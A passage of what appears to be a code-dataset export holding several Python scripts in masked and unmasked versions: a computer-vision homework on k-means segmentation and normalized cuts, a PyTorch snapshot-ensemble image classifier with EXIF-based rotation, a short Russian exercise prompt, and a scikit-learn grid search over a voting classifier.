print('=================================================')\n\ndef task_3_c():\n print(\"Task 3 (c) ...\")\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n '''\n ...\n your code ...\n ...\n '''\n grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')\n grayImg /= 255\n cv.imshow('Intensity Image', grayImg)\n \n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n grayVec = np.reshape(grayImg.copy(), (-1,1))\n\n index, centers = myKmeans(grayVec, k, useDist = True)\n\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n grayVec[indices] = grayVec[centers[kVal]]\n\n cv.imshow('Segmented Intensity Image (Scaled Distance) for k = ' + str(k), grayVec.reshape(grayImg.shape))\n \n cv.waitKey(0)\n\n print('=================================================')\n\n\n##############################################\n# Task 4 ##########################\n##############################################\n\n\ndef task_4_a():\n print(\"Task 4 (a) ...\")\n print('-------------------------------------------------')\n D = np.zeros((8,8)) \n W = np.array((\n [0, 1, 0.2, 1, 0, 0, 0, 0], # A\n [1, 0, 0.1, 0, 1, 0, 0, 0], # B\n [0.2, 0.1, 0, 1, 0, 1, 0.3, 0], # C\n [1, 0, 1, 0, 0, 1, 0, 0], # D\n [0, 1, 0, 0, 0, 0, 1, 1], # E\n [0, 0, 1, 1, 0, 0, 1, 0], # F\n [0, 0, 0.3, 0, 1, 1, 0, 1], # G\n [0, 0, 0, 0, 1, 0, 1, 0] # H\n )) # construct the W matrix\n\n for i in range(W.shape[0]):\n D[i,i] = np.sum(W[i,:]) # construct the D matrix\n\n '''\n ...\n your code ...\n ...\n '''\n invSqrtD = np.linalg.inv(np.sqrt(D))\n L = D - W\n\n op = np.matmul(np.matmul(invSqrtD,L),invSqrtD)\n _, _, eigenVecs = cv.eigen(op)\n secMinEigenVec = eigenVecs[eigenVecs.shape[1]-2, :]\n\n C1 = 0\n C2 = 0\n for i in range(secMinEigenVec.shape[0]):\n if secMinEigenVec[i] < 0:\n C1 += D[i,i]\n else:\n C2 += D[i,i]\n\n print('Eigen Vec: ' + str(np.round(secMinEigenVec, 3)))\n\n # Figure in pdf\n minNormCut = (1/C1 + 1/C2) * 2.4\n print('Min Norm Cut = ' + str(minNormCut))\n print('=================================================')\n\n##############################################\n##############################################\n##############################################\n\n\n# task_1_a()\n# task_1_b()\n# task_2()\n# task_3_a()\n# cv.destroyAllWindows()\n# task_3_b()\n# cv.destroyAllWindows()\n# task_3_c()\n# cv.destroyAllWindows()\ntask_4_a()",
"step-ids": [
7,
8,
10,
12,
13
]
}
|
[
7,
8,
10,
12,
13
] |
import torch
import torch.nn as nn
import torch.optim as optim
from torch.optim import lr_scheduler
import numpy as np
import torchvision
from torchvision import datasets, models, transforms
#import matplotlib.pyplot as plt
import time
import os
import copy
import torch.nn.functional as F
from PIL import Image, ExifTags
def train_model_snapshot(model, criterion, lr, dataloaders, dataset_sizes, device, num_cycles, num_epochs_per_cycle):
since = time.time()
best_model_wts = copy.deepcopy(model.state_dict())
best_acc = 0.0
best_loss = 1000000.0
model_w_arr = []
prob = torch.zeros((dataset_sizes['val'], 3), dtype = torch.float32).to(device)
lbl = torch.zeros((dataset_sizes['val'],), dtype = torch.long).to(device)
for cycle in range(num_cycles):
optimizer = optim.SGD(model.parameters(), lr=lr, momentum=0.9)#, weight_decay = 0.0005)
scheduler = lr_scheduler.CosineAnnealingLR(optimizer, num_epochs_per_cycle*len(dataloaders['train']))
for epoch in range(num_epochs_per_cycle):
#print('Cycle {}: Epoch {}/{}'.format(cycle, epoch, num_epochs_per_cycle - 1))
#print('-' * 10)
# Each epoch has a training and validation phase
for phase in ['train', 'val']:
if phase == 'train':
model.train() # Set model to training mode
else:
model.eval() # Set model to evaluate mode
running_loss = 0.0
running_corrects = 0
idx = 0
# Iterate over data.
for inputs, labels in dataloaders[phase]:
inputs = inputs.to(device)
labels = labels.to(device)
# zero the parameter gradients
optimizer.zero_grad()
# forward
# track history if only in train
with torch.set_grad_enabled(phase == 'train'):
outputs = model(inputs)
_, preds = torch.max(outputs, 1)
if (epoch == num_epochs_per_cycle-1) and (phase == 'val'):
prob[idx:idx+inputs.shape[0]] += F.softmax(outputs, dim = 1)
lbl[idx:idx+inputs.shape[0]] = labels
idx += inputs.shape[0]
loss = criterion(outputs, labels)
# backward + optimize only if in training phase
if phase == 'train':
loss.backward()
optimizer.step()
scheduler.step()
#print(optimizer.param_groups[0]['lr'])
# statistics
running_loss += loss.item() * inputs.size(0)
running_corrects += torch.sum(preds == labels.data)
epoch_loss = running_loss / dataset_sizes[phase]
epoch_acc = running_corrects.double() / dataset_sizes[phase]
#print('{} Loss: {:.4f} Acc: {:.4f}'.format(
# phase, epoch_loss, epoch_acc))
# deep copy the model
if phase == 'val' and epoch_loss < best_loss:
best_loss = epoch_loss
best_model_wts = copy.deepcopy(model.state_dict())
#print()
model_w_arr.append(copy.deepcopy(model.state_dict()))
prob /= num_cycles
ensemble_loss = F.nll_loss(torch.log(prob), lbl)
ensemble_loss = ensemble_loss.item()
time_elapsed = time.time() - since
#print('Training complete in {:.0f}m {:.0f}s'.format(
# time_elapsed // 60, time_elapsed % 60))
#print('Ensemble Loss : {:4f}, Best val Loss: {:4f}'.format(ensemble_loss, best_loss))
# load best model weights
model_arr =[]
for weights in model_w_arr:
model.load_state_dict(weights)
model_arr.append(model)
return model_arr, ensemble_loss, best_loss, prob
def test(models_arr, loader, device):
res = np.zeros((610, 3), dtype = np.float32)
for model in models_arr:
model.eval()
res_arr = []
for inputs, _ in loader:
inputs = inputs.to(device)
# forward
# track history if only in train
with torch.set_grad_enabled(False):
outputs = F.softmax(model(inputs), dim = 1)
res_arr.append(outputs.detach().cpu().numpy())
res_arr = np.concatenate(res_arr, axis = 0)
res += res_arr
return res / len(models_arr)
def read_train_data(p):
imgs = []
labels = []
for i, lbl in enumerate(os.listdir(p)):
for fname in os.listdir(os.path.join(p, lbl)):
#read image
img = Image.open(os.path.join(p, lbl, fname))
#rotate image to original view
try:
exif=dict((ExifTags.TAGS[k], v) for k, v in img._getexif().items() if k in ExifTags.TAGS)
if exif['Orientation'] == 3:
img=img.rotate(180, expand=True)
elif exif['Orientation'] == 6:
img=img.rotate(270, expand=True)
elif exif['Orientation'] == 8:
img=img.rotate(90, expand=True)
except:
pass
#resize all images to the same size
img = np.array(img.convert('RGB').resize((512,512), Image.ANTIALIAS))
imgs.append(img)
labels.append(i)
return imgs, labels
def read_test_data(p):
imgs = []
labels = []
ids = []
for fname in os.listdir(p):
#read image
img = Image.open(os.path.join(p, fname))
#rotate image to original view
try:
if not('DMWVNR' in fname):
exif=dict((ExifTags.TAGS[k], v) for k, v in img._getexif().items() if k in ExifTags.TAGS)
if exif['Orientation'] == 3:
img=img.rotate(180, expand=True)
elif exif['Orientation'] == 6:
img=img.rotate(270, expand=True)
elif exif['Orientation'] == 8:
img=img.rotate(90, expand=True)
except:
pass
#resize all images to the same size
img = img.convert('RGB').resize((512,512), Image.ANTIALIAS)
imgs.append(np.array(img.copy()))
labels.append(0)
ids.append(fname.split('.')[0])
img.close()
return imgs, labels, ids
|
normal
|
{
"blob_id": "d807a363c08d117c848ffdc0a768c696ea7746bd",
"index": 1787,
"step-1": "<mask token>\n\n\ndef train_model_snapshot(model, criterion, lr, dataloaders, dataset_sizes,\n device, num_cycles, num_epochs_per_cycle):\n since = time.time()\n best_model_wts = copy.deepcopy(model.state_dict())\n best_acc = 0.0\n best_loss = 1000000.0\n model_w_arr = []\n prob = torch.zeros((dataset_sizes['val'], 3), dtype=torch.float32).to(\n device)\n lbl = torch.zeros((dataset_sizes['val'],), dtype=torch.long).to(device)\n for cycle in range(num_cycles):\n optimizer = optim.SGD(model.parameters(), lr=lr, momentum=0.9)\n scheduler = lr_scheduler.CosineAnnealingLR(optimizer, \n num_epochs_per_cycle * len(dataloaders['train']))\n for epoch in range(num_epochs_per_cycle):\n for phase in ['train', 'val']:\n if phase == 'train':\n model.train()\n else:\n model.eval()\n running_loss = 0.0\n running_corrects = 0\n idx = 0\n for inputs, labels in dataloaders[phase]:\n inputs = inputs.to(device)\n labels = labels.to(device)\n optimizer.zero_grad()\n with torch.set_grad_enabled(phase == 'train'):\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n if (epoch == num_epochs_per_cycle - 1 and phase ==\n 'val'):\n prob[idx:idx + inputs.shape[0]] += F.softmax(\n outputs, dim=1)\n lbl[idx:idx + inputs.shape[0]] = labels\n idx += inputs.shape[0]\n loss = criterion(outputs, labels)\n if phase == 'train':\n loss.backward()\n optimizer.step()\n scheduler.step()\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n epoch_loss = running_loss / dataset_sizes[phase]\n epoch_acc = running_corrects.double() / dataset_sizes[phase]\n if phase == 'val' and epoch_loss < best_loss:\n best_loss = epoch_loss\n best_model_wts = copy.deepcopy(model.state_dict())\n model_w_arr.append(copy.deepcopy(model.state_dict()))\n prob /= num_cycles\n ensemble_loss = F.nll_loss(torch.log(prob), lbl)\n ensemble_loss = ensemble_loss.item()\n time_elapsed = time.time() - since\n model_arr = []\n for weights in model_w_arr:\n model.load_state_dict(weights)\n model_arr.append(model)\n return model_arr, ensemble_loss, best_loss, prob\n\n\ndef test(models_arr, loader, device):\n res = np.zeros((610, 3), dtype=np.float32)\n for model in models_arr:\n model.eval()\n res_arr = []\n for inputs, _ in loader:\n inputs = inputs.to(device)\n with torch.set_grad_enabled(False):\n outputs = F.softmax(model(inputs), dim=1)\n res_arr.append(outputs.detach().cpu().numpy())\n res_arr = np.concatenate(res_arr, axis=0)\n res += res_arr\n return res / len(models_arr)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef train_model_snapshot(model, criterion, lr, dataloaders, dataset_sizes,\n device, num_cycles, num_epochs_per_cycle):\n since = time.time()\n best_model_wts = copy.deepcopy(model.state_dict())\n best_acc = 0.0\n best_loss = 1000000.0\n model_w_arr = []\n prob = torch.zeros((dataset_sizes['val'], 3), dtype=torch.float32).to(\n device)\n lbl = torch.zeros((dataset_sizes['val'],), dtype=torch.long).to(device)\n for cycle in range(num_cycles):\n optimizer = optim.SGD(model.parameters(), lr=lr, momentum=0.9)\n scheduler = lr_scheduler.CosineAnnealingLR(optimizer, \n num_epochs_per_cycle * len(dataloaders['train']))\n for epoch in range(num_epochs_per_cycle):\n for phase in ['train', 'val']:\n if phase == 'train':\n model.train()\n else:\n model.eval()\n running_loss = 0.0\n running_corrects = 0\n idx = 0\n for inputs, labels in dataloaders[phase]:\n inputs = inputs.to(device)\n labels = labels.to(device)\n optimizer.zero_grad()\n with torch.set_grad_enabled(phase == 'train'):\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n if (epoch == num_epochs_per_cycle - 1 and phase ==\n 'val'):\n prob[idx:idx + inputs.shape[0]] += F.softmax(\n outputs, dim=1)\n lbl[idx:idx + inputs.shape[0]] = labels\n idx += inputs.shape[0]\n loss = criterion(outputs, labels)\n if phase == 'train':\n loss.backward()\n optimizer.step()\n scheduler.step()\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n epoch_loss = running_loss / dataset_sizes[phase]\n epoch_acc = running_corrects.double() / dataset_sizes[phase]\n if phase == 'val' and epoch_loss < best_loss:\n best_loss = epoch_loss\n best_model_wts = copy.deepcopy(model.state_dict())\n model_w_arr.append(copy.deepcopy(model.state_dict()))\n prob /= num_cycles\n ensemble_loss = F.nll_loss(torch.log(prob), lbl)\n ensemble_loss = ensemble_loss.item()\n time_elapsed = time.time() - since\n model_arr = []\n for weights in model_w_arr:\n model.load_state_dict(weights)\n model_arr.append(model)\n return model_arr, ensemble_loss, best_loss, prob\n\n\ndef test(models_arr, loader, device):\n res = np.zeros((610, 3), dtype=np.float32)\n for model in models_arr:\n model.eval()\n res_arr = []\n for inputs, _ in loader:\n inputs = inputs.to(device)\n with torch.set_grad_enabled(False):\n outputs = F.softmax(model(inputs), dim=1)\n res_arr.append(outputs.detach().cpu().numpy())\n res_arr = np.concatenate(res_arr, axis=0)\n res += res_arr\n return res / len(models_arr)\n\n\n<mask token>\n\n\ndef read_test_data(p):\n imgs = []\n labels = []\n ids = []\n for fname in os.listdir(p):\n img = Image.open(os.path.join(p, fname))\n try:\n if not 'DMWVNR' in fname:\n exif = dict((ExifTags.TAGS[k], v) for k, v in img._getexif(\n ).items() if k in ExifTags.TAGS)\n if exif['Orientation'] == 3:\n img = img.rotate(180, expand=True)\n elif exif['Orientation'] == 6:\n img = img.rotate(270, expand=True)\n elif exif['Orientation'] == 8:\n img = img.rotate(90, expand=True)\n except:\n pass\n img = img.convert('RGB').resize((512, 512), Image.ANTIALIAS)\n imgs.append(np.array(img.copy()))\n labels.append(0)\n ids.append(fname.split('.')[0])\n img.close()\n return imgs, labels, ids\n",
"step-3": "<mask token>\n\n\ndef train_model_snapshot(model, criterion, lr, dataloaders, dataset_sizes,\n device, num_cycles, num_epochs_per_cycle):\n since = time.time()\n best_model_wts = copy.deepcopy(model.state_dict())\n best_acc = 0.0\n best_loss = 1000000.0\n model_w_arr = []\n prob = torch.zeros((dataset_sizes['val'], 3), dtype=torch.float32).to(\n device)\n lbl = torch.zeros((dataset_sizes['val'],), dtype=torch.long).to(device)\n for cycle in range(num_cycles):\n optimizer = optim.SGD(model.parameters(), lr=lr, momentum=0.9)\n scheduler = lr_scheduler.CosineAnnealingLR(optimizer, \n num_epochs_per_cycle * len(dataloaders['train']))\n for epoch in range(num_epochs_per_cycle):\n for phase in ['train', 'val']:\n if phase == 'train':\n model.train()\n else:\n model.eval()\n running_loss = 0.0\n running_corrects = 0\n idx = 0\n for inputs, labels in dataloaders[phase]:\n inputs = inputs.to(device)\n labels = labels.to(device)\n optimizer.zero_grad()\n with torch.set_grad_enabled(phase == 'train'):\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n if (epoch == num_epochs_per_cycle - 1 and phase ==\n 'val'):\n prob[idx:idx + inputs.shape[0]] += F.softmax(\n outputs, dim=1)\n lbl[idx:idx + inputs.shape[0]] = labels\n idx += inputs.shape[0]\n loss = criterion(outputs, labels)\n if phase == 'train':\n loss.backward()\n optimizer.step()\n scheduler.step()\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n epoch_loss = running_loss / dataset_sizes[phase]\n epoch_acc = running_corrects.double() / dataset_sizes[phase]\n if phase == 'val' and epoch_loss < best_loss:\n best_loss = epoch_loss\n best_model_wts = copy.deepcopy(model.state_dict())\n model_w_arr.append(copy.deepcopy(model.state_dict()))\n prob /= num_cycles\n ensemble_loss = F.nll_loss(torch.log(prob), lbl)\n ensemble_loss = ensemble_loss.item()\n time_elapsed = time.time() - since\n model_arr = []\n for weights in model_w_arr:\n model.load_state_dict(weights)\n model_arr.append(model)\n return model_arr, ensemble_loss, best_loss, prob\n\n\ndef test(models_arr, loader, device):\n res = np.zeros((610, 3), dtype=np.float32)\n for model in models_arr:\n model.eval()\n res_arr = []\n for inputs, _ in loader:\n inputs = inputs.to(device)\n with torch.set_grad_enabled(False):\n outputs = F.softmax(model(inputs), dim=1)\n res_arr.append(outputs.detach().cpu().numpy())\n res_arr = np.concatenate(res_arr, axis=0)\n res += res_arr\n return res / len(models_arr)\n\n\ndef read_train_data(p):\n imgs = []\n labels = []\n for i, lbl in enumerate(os.listdir(p)):\n for fname in os.listdir(os.path.join(p, lbl)):\n img = Image.open(os.path.join(p, lbl, fname))\n try:\n exif = dict((ExifTags.TAGS[k], v) for k, v in img._getexif(\n ).items() if k in ExifTags.TAGS)\n if exif['Orientation'] == 3:\n img = img.rotate(180, expand=True)\n elif exif['Orientation'] == 6:\n img = img.rotate(270, expand=True)\n elif exif['Orientation'] == 8:\n img = img.rotate(90, expand=True)\n except:\n pass\n img = np.array(img.convert('RGB').resize((512, 512), Image.\n ANTIALIAS))\n imgs.append(img)\n labels.append(i)\n return imgs, labels\n\n\ndef read_test_data(p):\n imgs = []\n labels = []\n ids = []\n for fname in os.listdir(p):\n img = Image.open(os.path.join(p, fname))\n try:\n if not 'DMWVNR' in fname:\n exif = dict((ExifTags.TAGS[k], v) for k, v in img._getexif(\n ).items() if k in ExifTags.TAGS)\n if exif['Orientation'] == 3:\n img = img.rotate(180, expand=True)\n elif exif['Orientation'] == 6:\n img = img.rotate(270, expand=True)\n elif exif['Orientation'] == 8:\n img = img.rotate(90, expand=True)\n except:\n pass\n img = img.convert('RGB').resize((512, 512), Image.ANTIALIAS)\n imgs.append(np.array(img.copy()))\n labels.append(0)\n ids.append(fname.split('.')[0])\n img.close()\n return imgs, labels, ids\n",
"step-4": "import torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nimport numpy as np\nimport torchvision\nfrom torchvision import datasets, models, transforms\nimport time\nimport os\nimport copy\nimport torch.nn.functional as F\nfrom PIL import Image, ExifTags\n\n\ndef train_model_snapshot(model, criterion, lr, dataloaders, dataset_sizes,\n device, num_cycles, num_epochs_per_cycle):\n since = time.time()\n best_model_wts = copy.deepcopy(model.state_dict())\n best_acc = 0.0\n best_loss = 1000000.0\n model_w_arr = []\n prob = torch.zeros((dataset_sizes['val'], 3), dtype=torch.float32).to(\n device)\n lbl = torch.zeros((dataset_sizes['val'],), dtype=torch.long).to(device)\n for cycle in range(num_cycles):\n optimizer = optim.SGD(model.parameters(), lr=lr, momentum=0.9)\n scheduler = lr_scheduler.CosineAnnealingLR(optimizer, \n num_epochs_per_cycle * len(dataloaders['train']))\n for epoch in range(num_epochs_per_cycle):\n for phase in ['train', 'val']:\n if phase == 'train':\n model.train()\n else:\n model.eval()\n running_loss = 0.0\n running_corrects = 0\n idx = 0\n for inputs, labels in dataloaders[phase]:\n inputs = inputs.to(device)\n labels = labels.to(device)\n optimizer.zero_grad()\n with torch.set_grad_enabled(phase == 'train'):\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n if (epoch == num_epochs_per_cycle - 1 and phase ==\n 'val'):\n prob[idx:idx + inputs.shape[0]] += F.softmax(\n outputs, dim=1)\n lbl[idx:idx + inputs.shape[0]] = labels\n idx += inputs.shape[0]\n loss = criterion(outputs, labels)\n if phase == 'train':\n loss.backward()\n optimizer.step()\n scheduler.step()\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n epoch_loss = running_loss / dataset_sizes[phase]\n epoch_acc = running_corrects.double() / dataset_sizes[phase]\n if phase == 'val' and epoch_loss < best_loss:\n best_loss = epoch_loss\n best_model_wts = copy.deepcopy(model.state_dict())\n model_w_arr.append(copy.deepcopy(model.state_dict()))\n prob /= num_cycles\n ensemble_loss = F.nll_loss(torch.log(prob), lbl)\n ensemble_loss = ensemble_loss.item()\n time_elapsed = time.time() - since\n model_arr = []\n for weights in model_w_arr:\n model.load_state_dict(weights)\n model_arr.append(model)\n return model_arr, ensemble_loss, best_loss, prob\n\n\ndef test(models_arr, loader, device):\n res = np.zeros((610, 3), dtype=np.float32)\n for model in models_arr:\n model.eval()\n res_arr = []\n for inputs, _ in loader:\n inputs = inputs.to(device)\n with torch.set_grad_enabled(False):\n outputs = F.softmax(model(inputs), dim=1)\n res_arr.append(outputs.detach().cpu().numpy())\n res_arr = np.concatenate(res_arr, axis=0)\n res += res_arr\n return res / len(models_arr)\n\n\ndef read_train_data(p):\n imgs = []\n labels = []\n for i, lbl in enumerate(os.listdir(p)):\n for fname in os.listdir(os.path.join(p, lbl)):\n img = Image.open(os.path.join(p, lbl, fname))\n try:\n exif = dict((ExifTags.TAGS[k], v) for k, v in img._getexif(\n ).items() if k in ExifTags.TAGS)\n if exif['Orientation'] == 3:\n img = img.rotate(180, expand=True)\n elif exif['Orientation'] == 6:\n img = img.rotate(270, expand=True)\n elif exif['Orientation'] == 8:\n img = img.rotate(90, expand=True)\n except:\n pass\n img = np.array(img.convert('RGB').resize((512, 512), Image.\n ANTIALIAS))\n imgs.append(img)\n labels.append(i)\n return imgs, labels\n\n\ndef read_test_data(p):\n imgs = []\n labels = []\n ids = []\n for fname in os.listdir(p):\n img = Image.open(os.path.join(p, fname))\n try:\n if not 'DMWVNR' in fname:\n exif = dict((ExifTags.TAGS[k], v) for k, v in img._getexif(\n ).items() if k in ExifTags.TAGS)\n if exif['Orientation'] == 3:\n img = img.rotate(180, expand=True)\n elif exif['Orientation'] == 6:\n img = img.rotate(270, expand=True)\n elif exif['Orientation'] == 8:\n img = img.rotate(90, expand=True)\n except:\n pass\n img = img.convert('RGB').resize((512, 512), Image.ANTIALIAS)\n imgs.append(np.array(img.copy()))\n labels.append(0)\n ids.append(fname.split('.')[0])\n img.close()\n return imgs, labels, ids\n",
"step-5": "import torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nimport numpy as np\nimport torchvision\nfrom torchvision import datasets, models, transforms\n#import matplotlib.pyplot as plt\nimport time\nimport os\nimport copy\nimport torch.nn.functional as F\nfrom PIL import Image, ExifTags\n\ndef train_model_snapshot(model, criterion, lr, dataloaders, dataset_sizes, device, num_cycles, num_epochs_per_cycle):\n since = time.time()\n\n best_model_wts = copy.deepcopy(model.state_dict())\n best_acc = 0.0\n best_loss = 1000000.0\n model_w_arr = []\n prob = torch.zeros((dataset_sizes['val'], 3), dtype = torch.float32).to(device)\n lbl = torch.zeros((dataset_sizes['val'],), dtype = torch.long).to(device)\n for cycle in range(num_cycles):\n optimizer = optim.SGD(model.parameters(), lr=lr, momentum=0.9)#, weight_decay = 0.0005)\n scheduler = lr_scheduler.CosineAnnealingLR(optimizer, num_epochs_per_cycle*len(dataloaders['train']))\n for epoch in range(num_epochs_per_cycle):\n #print('Cycle {}: Epoch {}/{}'.format(cycle, epoch, num_epochs_per_cycle - 1))\n #print('-' * 10)\n\n # Each epoch has a training and validation phase\n for phase in ['train', 'val']:\n if phase == 'train':\n model.train() # Set model to training mode\n else:\n model.eval() # Set model to evaluate mode\n\n running_loss = 0.0\n running_corrects = 0\n idx = 0\n # Iterate over data.\n for inputs, labels in dataloaders[phase]:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward\n # track history if only in train\n with torch.set_grad_enabled(phase == 'train'):\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n if (epoch == num_epochs_per_cycle-1) and (phase == 'val'):\n prob[idx:idx+inputs.shape[0]] += F.softmax(outputs, dim = 1)\n lbl[idx:idx+inputs.shape[0]] = labels\n idx += inputs.shape[0]\n loss = criterion(outputs, labels)\n # backward + optimize only if in training phase\n if phase == 'train':\n loss.backward()\n optimizer.step()\n scheduler.step()\n #print(optimizer.param_groups[0]['lr'])\n \n # statistics\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n\n epoch_loss = running_loss / dataset_sizes[phase]\n epoch_acc = running_corrects.double() / dataset_sizes[phase]\n\n #print('{} Loss: {:.4f} Acc: {:.4f}'.format(\n # phase, epoch_loss, epoch_acc))\n\n # deep copy the model\n if phase == 'val' and epoch_loss < best_loss:\n best_loss = epoch_loss\n best_model_wts = copy.deepcopy(model.state_dict())\n #print()\n model_w_arr.append(copy.deepcopy(model.state_dict()))\n\n prob /= num_cycles\n ensemble_loss = F.nll_loss(torch.log(prob), lbl) \n ensemble_loss = ensemble_loss.item()\n time_elapsed = time.time() - since\n #print('Training complete in {:.0f}m {:.0f}s'.format(\n # time_elapsed // 60, time_elapsed % 60))\n #print('Ensemble Loss : {:4f}, Best val Loss: {:4f}'.format(ensemble_loss, best_loss))\n\n # load best model weights\n model_arr =[]\n for weights in model_w_arr:\n model.load_state_dict(weights) \n model_arr.append(model) \n return model_arr, ensemble_loss, best_loss, prob\n\ndef test(models_arr, loader, device):\n res = np.zeros((610, 3), dtype = np.float32)\n for model in models_arr:\n model.eval()\n res_arr = []\n for inputs, _ in loader:\n inputs = inputs.to(device)\n # forward\n # track history if only in train\n with torch.set_grad_enabled(False):\n outputs = F.softmax(model(inputs), dim = 1) \n res_arr.append(outputs.detach().cpu().numpy())\n res_arr = np.concatenate(res_arr, axis = 0)\n res += res_arr\n return res / len(models_arr)\n\ndef read_train_data(p):\n imgs = []\n labels = []\n for i, lbl in enumerate(os.listdir(p)):\n for fname in os.listdir(os.path.join(p, lbl)):\n #read image\n img = Image.open(os.path.join(p, lbl, fname))\n #rotate image to original view\n try:\n exif=dict((ExifTags.TAGS[k], v) for k, v in img._getexif().items() if k in ExifTags.TAGS)\n if exif['Orientation'] == 3:\n img=img.rotate(180, expand=True)\n elif exif['Orientation'] == 6:\n img=img.rotate(270, expand=True)\n elif exif['Orientation'] == 8:\n img=img.rotate(90, expand=True)\n except:\n pass\n #resize all images to the same size\n img = np.array(img.convert('RGB').resize((512,512), Image.ANTIALIAS))\n imgs.append(img)\n labels.append(i)\n return imgs, labels\n\ndef read_test_data(p):\n imgs = []\n labels = []\n ids = []\n for fname in os.listdir(p):\n #read image\n img = Image.open(os.path.join(p, fname))\n #rotate image to original view\n try:\n if not('DMWVNR' in fname):\n exif=dict((ExifTags.TAGS[k], v) for k, v in img._getexif().items() if k in ExifTags.TAGS)\n if exif['Orientation'] == 3:\n img=img.rotate(180, expand=True)\n elif exif['Orientation'] == 6:\n img=img.rotate(270, expand=True)\n elif exif['Orientation'] == 8:\n img=img.rotate(90, expand=True)\n except:\n pass\n #resize all images to the same size\n img = img.convert('RGB').resize((512,512), Image.ANTIALIAS)\n imgs.append(np.array(img.copy()))\n labels.append(0)\n ids.append(fname.split('.')[0])\n img.close()\n return imgs, labels, ids\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
"""
Написать программу, которая принимает строку
и выводит строку без пробелов и ее длину.
Для удаления пробелов реализовать доп функцию.
"""
|
normal
|
{
"blob_id": "1eab2ddda6fdd71db372e978caa6e7d24c7fe78e",
"index": 7724,
"step-1": "<mask token>\n",
"step-2": "\"\"\"\n Написать программу, которая принимает строку\n и выводит строку без пробелов и ее длину.\n Для удаления пробелов реализовать доп функцию.\n\"\"\"",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
from os import path
from sklearn.model_selection import StratifiedShuffleSplit
from sklearn.pipeline import Pipeline
from sta211.datasets import load_train_dataset, load_test_dataset, find_best_train_dataset
from sklearn.model_selection import GridSearchCV
from sta211.selection import get_naive_bayes, get_mlp, get_svm, get_gradient_boosting, get_random_forest, get_best_hyper_parameters, get_extra_trees, get_adaboost, get_voting_classifier
from multiprocessing import cpu_count
n_jobs = max(1, cpu_count()-1)
test_size = 0.20
X, y, quantitatives = load_train_dataset()
# Manual aggregation
pipe, search_grid = get_voting_classifier()
# pipes, search_grid = get_svm()
# pipe = Pipeline(pipes)
cv = StratifiedShuffleSplit(test_size=test_size, random_state=0, n_splits=5)
grid = GridSearchCV(pipe, search_grid, cv=cv, n_jobs=n_jobs, return_train_score=True, refit=True, scoring="accuracy")
grid.fit(X, y)
parameters = get_best_hyper_parameters(grid)
print("Result for {} configurations".format(len(parameters)))
for p in parameters:
print("{};{:.2f}%;{:.4f}%;±{:.4f}%".format(
", ".join(map(lambda k: "{}={}".format(k.split("__")[1], p["params"][k]), p["params"].keys())),
100.0 * p["mean_train_score"],
100.0 * p["mean_test_score"],
200.0 * p["std_test_score"]
))
# print("Results: Train: {:.2f}%, Test: {:.2f}% std:{:.4f} for {}".format(100 * p["mean_train_score"], 100 * p["mean_test_score"], p["std_test_score"], p["params"]))
prediction_file = "{}/predictions.csv".format(path.dirname(path.abspath(__file__)))
pred = grid.predict(load_test_dataset())
f = open(prediction_file, "w")
f.write("\n".join(map(lambda o: str(o), pred)))
f.close()
|
normal
|
{
"blob_id": "c99878dbd5610c8a58f00912e111b1eef9d3893e",
"index": 7782,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ngrid.fit(X, y)\n<mask token>\nprint('Result for {} configurations'.format(len(parameters)))\nfor p in parameters:\n print('{};{:.2f}%;{:.4f}%;±{:.4f}%'.format(', '.join(map(lambda k:\n '{}={}'.format(k.split('__')[1], p['params'][k]), p['params'].keys(\n ))), 100.0 * p['mean_train_score'], 100.0 * p['mean_test_score'], \n 200.0 * p['std_test_score']))\n<mask token>\nf.write('\\n'.join(map(lambda o: str(o), pred)))\nf.close()\n",
"step-3": "<mask token>\nn_jobs = max(1, cpu_count() - 1)\ntest_size = 0.2\nX, y, quantitatives = load_train_dataset()\npipe, search_grid = get_voting_classifier()\ncv = StratifiedShuffleSplit(test_size=test_size, random_state=0, n_splits=5)\ngrid = GridSearchCV(pipe, search_grid, cv=cv, n_jobs=n_jobs,\n return_train_score=True, refit=True, scoring='accuracy')\ngrid.fit(X, y)\nparameters = get_best_hyper_parameters(grid)\nprint('Result for {} configurations'.format(len(parameters)))\nfor p in parameters:\n print('{};{:.2f}%;{:.4f}%;±{:.4f}%'.format(', '.join(map(lambda k:\n '{}={}'.format(k.split('__')[1], p['params'][k]), p['params'].keys(\n ))), 100.0 * p['mean_train_score'], 100.0 * p['mean_test_score'], \n 200.0 * p['std_test_score']))\nprediction_file = '{}/predictions.csv'.format(path.dirname(path.abspath(\n __file__)))\npred = grid.predict(load_test_dataset())\nf = open(prediction_file, 'w')\nf.write('\\n'.join(map(lambda o: str(o), pred)))\nf.close()\n",
